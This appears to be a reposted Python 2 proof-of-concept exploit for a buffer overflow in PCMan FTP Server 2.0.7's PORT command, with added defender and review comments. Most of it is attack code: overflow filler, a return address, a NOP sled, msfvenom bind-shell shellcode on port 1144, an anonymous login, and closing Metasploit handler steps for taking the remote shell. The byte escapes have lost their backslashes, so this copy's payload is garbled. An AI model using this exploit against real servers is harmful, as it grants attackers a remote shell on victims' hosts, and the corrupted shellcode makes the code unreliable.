PCMan FTP Server 2.0.7 PORT Buffer Overflow
Posted on 05 November 2016
#!/usr/bin/env python
#-*- coding: utf-8 -*-
# Exploit Title: PCMan FTP Server 2.0 PORT Command BoF Exploit
# Author: Pablo GonzA!lez
# Date: 4/11/2016
# Software: PCMan 2.0
# Tested on: Windows XP Profesional SP3 Spanish x86
#
# Proof-of-concept script for a buffer overflow in PCMan FTP Server's PORT
# command handler. It logs in as "anonymous" and then sends a PORT argument
# of several kilobytes instead of the short "h1,h2,h3,h4,p1,p2" form the
# command normally carries. Python 2 syntax throughout (print statements,
# raw_input).
#
# Defender notes, grounded in what this script does on the wire:
#  - Trigger signature: one FTP control-channel PORT command whose argument
#    is thousands of characters long. Legitimate PORT arguments are a few
#    comma-separated decimals, so an argument-length threshold on FTP
#    control traffic is a high-fidelity detection for this class of attack.
#  - The script logs in with USER anonymous and an empty PASS first, so
#    anonymous logins immediately followed by a PCMan crash are the host-side
#    symptom to correlate.
#  - Per the msfvenom comment below, the intended payload is a bind shell on
#    TCP 1144: a new listening socket on the FTP host after the service dies.
#  - Mitigation is replacing or removing the vulnerable server version;
#    disabling anonymous access only raises the bar to an authenticated user.
import socket
print "Creating malicious input!"
# NOTE(review): as reproduced on this page the byte escapes carry no leading
# backslash ('x41', 'xf7', ...), so each literal is ordinary 3-character text
# rather than the single byte the surrounding comments describe; len(junk)
# evaluates to 6021 characters here, not 2007 bytes. Read the sizes and
# addresses in the comments as the author's intent, not as what this copy
# actually builds.
junk = 'x41'*2007                       # filler; `ret` is placed directly after it
ret="xf7x56x3cx7e" #User32.dll 7E3C56F7   (author's note: an address inside User32.dll, written byte-reversed)
nops = 'x90'*20                          # 20 copies of 'x90' placed between `ret` and the payload
#msfvenom -p windows/shell_bind_tcp LPORT=1144 -b 'x0ax00x0d' -f c
#put shellcode in variable 'sc'
# `sc` is the msfvenom output pasted as adjacent string literals (implicit
# concatenation inside the parentheses); it is not inspected or altered here.
sc=("xdbxd6xbaxd3x95x1bxd0xd9x74x24xf4x58x2bxc9xb1"
"x53x31x50x17x83xe8xfcx03x83x86xf9x25xdfx41x7f"
"xc5x1fx92xe0x4fxfaxa3x20x2bx8fx94x90x3fxddx18"
"x5ax6dxf5xabx2exbaxfax1cx84x9cx35x9cxb5xddx54"
"x1exc4x31xb6x1fx07x44xb7x58x7axa5xe5x31xf0x18"
"x19x35x4cxa1x92x05x40xa1x47xddx63x80xd6x55x3a"
"x02xd9xbax36x0bxc1xdfx73xc5x7ax2bx0fxd4xaax65"
"xf0x7bx93x49x03x85xd4x6exfcxf0x2cx8dx81x02xeb"
"xefx5dx86xefx48x15x30xcbx69xfaxa7x98x66xb7xac"
"xc6x6ax46x60x7dx96xc3x87x51x1ex97xa3x75x7ax43"
"xcdx2cx26x22xf2x2ex89x9bx56x25x24xcfxeax64x21"
"x3cxc7x96xb1x2ax50xe5x83xf5xcax61xa8x7exd5x76"
"xcfx54xa1xe8x2ex57xd2x21xf5x03x82x59xdcx2bx49"
"x99xe1xf9xe4x91x44x52x1bx5cx36x02x9bxcexdfx48"
"x14x31xffx72xfex5ax68x8fx01x60x11x06xe7x02xf1"
"x4exbfxbax33xb5x08x5dx4bx9fx20xc9x04xc9xf7xf6"
"x94xdfx5fx60x1fx0cx64x91x20x19xccxc6xb7xd7x9d"
"xa5x26xe7xb7x5dxcax7ax5cx9dx85x66xcbxcaxc2x59"
"x02x9exfexc0xbcxbcx02x94x87x04xd9x65x09x85xac"
"xd2x2dx95x68xdax69xc1x24x8dx27xbfx82x67x86x69"
"x5dxdbx40xfdx18x17x53x7bx25x72x25x63x94x2bx70"
"x9cx19xbcx74xe5x47x5cx7ax3cxccx6cx31x1cx65xe5"
"x9cxf5x37x68x1fx20x7bx95x9cxc0x04x62xbcxa1x01"
"x2ex7ax5ax78x3fxefx5cx2fx40x3a")
# Final PORT argument: filler, overwrite value, padding, payload, in that order.
buffer= junk + ret + nops + sc
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Target is taken interactively; there is no validation of the input.
ip = raw_input('Give me Remote IP Address:')
# socket.connect() returns None, so `connect` is always None and never read.
connect=s.connect((ip,21))
banner = s.recv(1024)
print banner
# Anonymous login. Every server reply is read with recv() and discarded: the
# script never checks the FTP status codes, so it proceeds even if the login
# was rejected. Note that in this copy the commands end in a space rather
# than a CRLF line terminator.
s.send('USER anonymous ')
s.recv(1024)
s.send('PASS ')
s.recv(1024)
#Sending input PORT command (Exploitation is coming)
# The oversized argument is sent as one write and the socket is closed
# immediately, without waiting for or reading a reply.
s.send('PORT' + buffer + ' ')
s.close()
#Metasploit exploit/multi/handler or nc <ip> <port> :D
#
# For exploit/multi/handler
#
# use exploit/multi/handler
# set PAYLOAD windows/shell_bind_tcp
# set RHOST <ip>
# set LPORT 1144
# exploit
# ...
# Got it!
# The closing message is printed unconditionally; nothing in the script
# confirms whether the server crashed or the payload ran.
print "Got it? :D"